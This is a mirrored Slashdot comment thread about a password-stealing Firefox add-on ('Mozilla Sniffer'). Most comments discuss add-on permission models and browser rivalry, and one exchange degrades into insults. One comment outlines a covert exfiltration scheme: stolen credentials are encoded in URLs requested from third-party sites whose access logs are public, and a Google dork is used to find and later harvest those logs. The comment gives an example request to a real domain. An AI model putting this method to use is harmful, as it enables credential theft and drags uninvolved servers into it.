Slashdot Mirror
How the Mozilla Sniffer Backdoor Was Discovered
An anonymous reader writes "Mozilla pulled one of their Firefox add-ons earlier this week for containing a backdoor which stole passwords from its users. Netcraft has taken a closer look at how the rogue extension worked, and how it was discovered by chance rather than through any code review process. Mozilla are working on a new security model to stop this kind of backdoor happening again."
I mean seriously, the addons give access to everything you do in the browser. A lot of people here on slashdot know not to run random executables from the Internet, but do nothing to check if their browser addons are secure and not malware.
This is why I love that Opera comes build-in with all the features you need and a lot more. Not only are they made using the same quality standards and conventions, there is no way some rogue developer could hide password stealing code in them.
Looks like the stolen data was being sent to a hacked BlueHost account. Figures.
What was the addon supposed to do?
I'm sure there's some parallel regarding the Android vs Apple's logic in distributing apps.. but I'll likely be moderated a troll on /. for pointing them out..
Good job not actually telling the name of the offending plugin in the article blurb there. 'A new severe bug in mozilla is allowing hooligans to steal your passwords. But we won't tell you which one until after the break!'
I have nothing compelling to say
Do you mean to say that, when I install a Firefox add-on, Firefox won't give a list of requested privileges? Why has it taken 30 years for people who think in Unix security terms to not catch up to the VMS "fine-grained privileges to executables for users" security model?
The whole regular user / root thing is awful. Microsoft is still doing it wrong because, while the NT kernel may approach the right idea, it builds atop it a mess of get-out-of-jail-free paths.
It's not impossible.
(1) By default, allow nothing;
(2) Never allow everything - require software to specify exactly what it needs;
(3) Classify permissions so the user is alerted more violently for more risky permissions - this may depend on the circumstances (e.g. a browser add-on usually shouldn't be asking for the same sort of privileges as backup software);
(4) Software which needs an unusually privileged environment may benefit from auditing and signing, but never make this compulsory because this pisses off everyone;
(5) But, by default, refuse in such circumstances and indicate why. The user needs to make a conscious effort to override a reasonable set of auto-refusal defaults;
(6) Distinguish explicitly between once, occasional, time-limited and forever permissions. To take a particularly insidious example: iPhones ask if you want to give permission for your app to read your GPS location. This isn't permission for the next 15 minuts or day; it's permission forever. That is wrong. Looked at from the other end, don't do a Vista and ask every time. This is worse than not asking at all.
More thoughts, guise?
This guy is a native English speaker with a good education and almost surely a security professional trying to see how far he can get.
The typos he has NOT made give it away, among other clues:
(1) "it's" is always correctly used
(2) looks like he deliberately added plurals making it look as though his English is poor
(3) John "Devid"
(4) "check it out"
(5) "don't" is correct
(6) no other spelling characteristic Eastern European mistakes
Just my opinion, I could be wrong.
.. when you install an unverified, experimental Firefox extension from an untrusted author! Firefox extensions are great because of their power to affect the entire browser and even the host computer, which is what made Firefox popular IMO. But this comes with obvious risks you shouldn't ignore!
Not only that, but the author couldn't even use proper English in the addon description:
Given that, I hate to say that "people had it coming", but I figure people had ample warning that they were trying something that could be malicious.
on Apple's store your suggesting we avoid Apple products? I figure you were going to imply Android as being less safe, but the only recent story about market safety I have seen is someone exploiting iTunes accounts to the benefit of a single developer.
though it would be interesting to have two bad apps released simultaneously into both markets and see which one gets caught first
* Winners compare their achievements to their goals, losers compare theirs to that of others.
This guy is a native English speaker with a good education and almost surely a security professional trying to see how far he can get. The typos he has NOT made give it away, among other clues: (1) "it's" is always correctly used (2) looks like he deliberately added plurals making it look as though his English is poor (3) John "Devid" (4) "check it out" (5) "don't" is correct (6) no other spelling characteristic Eastern European mistakes
Just my opinion, I could be wrong.
Simples
that extension is dead.
this is just a placeholder till i send back my real sig from the future.
Obviously, their grammatical misconceptions cost them something, this time.
HBI's Law: Frequency of calling others Nazis is directly correlated with the likelihood of the accuser being Communist.
The addon was called "Mozilla Sniffer", and people still installed it? I would understand if this was some functionallity hidden in a valid sounding addon but its called "Mozilla Sniffer". User FAIL.
Rob
You could try Dillo.
Do what thou wilt shall be the whole of the Law
Comment removed based on user account deletion
That's a lie, unless you're suggesting that they planted the rogue addon themselves. Why would they do that? Yes, it was called "Mozilla Sniffer" and they should have pulled it immediately, without review, for violating their trademark. But nothing indicates that this addon was released by Mozilla or anyone associated with Mozilla.
When writing Trojans like this, there are several considerations that this author failed on.
1) Obscuring the code, so that it lasts longer, even upon scrutiny of the source.
2) Obscuring the password delivery mechanism to reduce the likelihood of detection of the code execution.
3) Obscure the password retrieval, to reduce the likelihood that the perpetrator would be caught, even if the authorities discover the code.
Much has been written about item 1, obscuring code. But I haven't seen much research describing items 2 or 3.
If I were writing the code, I would integrate the password theft and remote delivery into the main purpose of the code. For instance, say you wrote a plug-in whose function was to report to the user some information retrieved from Google and other sites. e.g. "This plug-in helps with Search Engine Optimization, by reporting potential keywords that can be added to the web page to increase results". With that sort of purpose, hits to Google and other sites wouldn't be suspected.
Some of my hits to Google would be to locate an open log file, with a Google Query like this query: "get / http/1.1" 200 mozilla filetype:log
Once I found a web server with a log file that was openly being displayed on the web, I'd pass the stolen information (stolen user name, stolen password, and site that this information can be used on) in the form of a URL, possibly encoding the payload information (I don't encode it below, for clarity).
Then my rouge program would request a few more pages from other sites that have open log files, just to obscure my activities, specifically requesting the log file page itself (and disposing of the results). I'll explain why this step is important later...
Example: Using my Google query above, I can see that bullyentertainment.com has its logfile exposed (sorry, bullyentertainment, you're just the first one on my list of hundreds of thousands of open logfiles). That means that my trojan horse can request a page on bullyentertainment.com, (like www.bullyentertainment.com/stolen_info?user=myuser&pwd=hunter2&site=gmail.com it will log my hit into that file - logging the stolen user name, password, and site information into a remote innocent bystander server. If my rouge program requests a page on bullyentertainment.com with some information encoded in the URL, I can effectively transfer the secret stolen information from the infected PC to an innocent bystander (bullyentertainment.com).
Then later, back at secret spy headquarters, I can use the same Google Query to locate log files that have my secret information in them, like www.bullyentertainment.com/logs/access.log which was a log file shown by my Google Query. I can follow the same pattern as the infected PC - first hit a page passing some URL containing secret information, and then retrieve the log file - so my activities ALSO look like an infected PC. But by retrieving the log file, I have retrieved all of the stolen passwords.
This technique is a way to pass stolen information back to the hacker without detection, by going through an intermediary. Because spy headquarters uses the same procedure as a hacked PC, it cannot easily be detected as the destination of the information. Use of proxies can further hinder attempts to catch the hacker. In a real hack, I'd encode the secret information, so that only I was able to easily decode it. But you get the idea.
PS If you test the above links, no harm, but your IP address will be logged (just as it is with any click), but it will be visible to other users on an exposed log file. No big deal, but I thought I'd mention it.
I use Mac OS, so I'm indemnified from having to pay the $699 indulgence to cover my cocksmoking and teabagging. So SCOX[Q] off!
An add-on called "Mozilla Sniffer" was uploaded on June 6th to addons.mozilla.org.
That’s like uploading a add-on called “Windows Virus”. Who the hell would install that?
I mean even Joe DontKnowShit would think twice before installing something that reminds him of a TLA agent or spy trying to get a look at his privates.
Any sufficiently advanced intelligence is indistinguishable from stupidity.
and you find a domain name. i wonder why he used an ip instead???
Ok, ok. What if the Italian pool boy's name is Mozilla and he likes sniffing "backdoors"?
Winkey shortcut mapping for 64bit windows. WinKeyPlus
jwhois 74.220.219.77
[Querying whois.arin.net]
[whois.arin.net]
OrgName: Bluehost Inc.
OrgID: BLUEH-2
Address: 1958 South 950 East
City: Provo
StateProv: UT
PostalCode: 84606
Country: US
So has law enforcement been notified?
...with the fact that you own a secret spy headquarters. How may I join your rogue organization? I assume you will simply show up one day by rappelling from the ceiling and giving me the choice to join, or to die. I already own a black outfit from the time I played Hudson Hawk in a stage production of the film (those critics didn't understand my interpretation of Hudson as a jaded post-Katrina Robin Hood), and would be ready to learn. I think I am qualified for at least henchman status, though I would insist on a career path that could possibly lead to an global enforcer position, like Angeline Joile plays in Salt. In any case, I await your arrival.
It figures that these two words would appear together in a story about the most bloated, memory-leaking browser ever...
...snip...
I don't bother making reports - I guess if I did, I might get my name attached to some zero day thingy. Hmmmm. That might not be good either. The better known you are, the harder it is to stay anoynymous when you really WANT to be anonymous!
For some things like this you MUST have a zero day tossable email account. One that does not have an address book or shared pass word. Since email accounts expect an existing email account to validate use a company account to validate a yahoo to validate a gmail to validate a microsoft to validate your TOSSABLE. Law enforcement can still get to you but hackers outside the law would have to hack security at least two companies to get to you. While we are at it keep a LiveDVD with a browser that works and use it to access money sites. In some cases a LiveUSB key with a small file system partition to keep links handy is justified. vim -x handy-links4bob
Truth is stranger than fiction, but it is because Fiction is obliged to stick to possibilities; Truth isn't. Mark Twain.
I prefer Firefox's way of offering a basic browser and moving extended or niche features to optional extensions to monolithic blocks like Opera. by silanea (1241518) writes: on Thursday July 15, @09:24AM (#32912378)
I have to admit that I have read your history this week here and that you are indeed stupid as most all of your repliers have been saying, as well as a firefox fanboy troll type here. This next summation of your stupidity via quoting you really takes the cake though:
Of course there is a risk associated with this model, but in my case the benefits far outweigh that risk. by silanea (1241518) writes: on Thursday July 15, @09:24AM (#32912378)
Yes, the risk is a browser that consistently has more security issues in it over time than Opera has had, for one thing, and also that Firefox has been consistently slower than Opera over time also in all things web over time typically.
(You truly are stupid, and an obvious firefox shill)
See subject above, you retarded moron. The amusing part of your posts here is that You make it terribly obvious you are nothing more than another firefox fanboy shill in your posts in this very exchange because you try to make it seem that "it's ok that firefox is slower than Opera and has more security bugs than Opera also". Who are you kidding except yourself idiot?